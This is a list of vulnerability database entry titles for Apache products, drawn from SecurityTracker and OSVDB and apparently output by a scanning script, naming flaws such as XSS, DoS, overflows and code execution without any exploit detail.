| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
| [1008920] Apache mod_digest May Validate Replayed Client Responses
| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
| [1008030] Apache mod_rewrite Contains a Buffer Overflow
| [1008029] Apache mod_alias Contains a Buffer Overflow
| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
|
| OSVDB - http://www.osvdb.org:
| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
| [96077] Apache CloudStack Global Settings Multiple Field XSS
| [96076] Apache CloudStack Instances Menu Display Name Field XSS
| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
| [94279] Apache Qpid CA Certificate Validation Bypass
| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
| [94042] Apache Axis JAX-WS Java Unspecified Exposure
| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
| [93541] Apache Solr json.wrf Callback XSS
| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
| [93521] Apache jUDDI Security API Token Session Persistence Weakness
| [93520] Apache CloudStack Default SSL Key Weakness
| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
| [93515] Apache HBase table.jsp name Parameter XSS
| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
| [93252] Apache Tomcat FORM Authenticator Session Fixation
| [93172] Apache Camel camel/endpoints/ Endpoint XSS
| [93171] Apache Sling HtmlResponse Error Message XSS
| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
| [93168] Apache Click ErrorReport.java id Parameter XSS
| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
| [93144] Apache Solr Admin Command Execution CSRF
| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
| [92748] Apache CloudStack VM Console Access Restriction Bypass
| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
| [92706] Apache ActiveMQ Debug Log Rendering XSS
| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
16316| [92270] Apache Tomcat Unspecified CSRF
16317| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
16318| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
16319| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
16320| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
16321| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
16322| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
16323| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
16324| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
16325| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
16326| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
16327| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
16328| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
16329| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
16330| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
16331| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
16332| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
16333| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
16334| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
16335| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
16336| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
16337| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
16338| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
16339| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
16340| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
16341| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
16342| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
16343| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
16344| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
16345| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
16346| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
16347| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
16348| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
16349| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
16350| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
16351| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
16352| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
16353| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
16354| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
16355| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
16356| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
16357| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
16358| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
16359| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
16360| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
16361| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
16362| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
16363| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
16364| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
16365| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
16366| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
16367| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
16368| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
16369| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
| [86901] Apache Tomcat Error Message Path Disclosure
| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
| [85430] Apache mod_pagespeed Module Unspecified XSS
| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
| [85249] Apache Wicket Unspecified XSS
| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
| [83339] Apache Roller Blogger Roll Unspecified XSS
| [83270] Apache Roller Unspecified Admin Action CSRF
| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
| [80300] Apache Wicket wicket:pageMapName Parameter XSS
| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
| [78331] Apache Tomcat Request Object Recycling Information Disclosure
| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
